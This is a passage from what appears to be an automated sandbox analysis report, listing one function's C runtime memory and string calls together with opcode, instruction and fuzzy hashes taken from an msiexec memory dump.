                                                                    • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                    Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040797A
                                                                    • free.MSVCRT ref: 0040799A
                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                    • free.MSVCRT ref: 004079BD
                                                                    • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                    • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59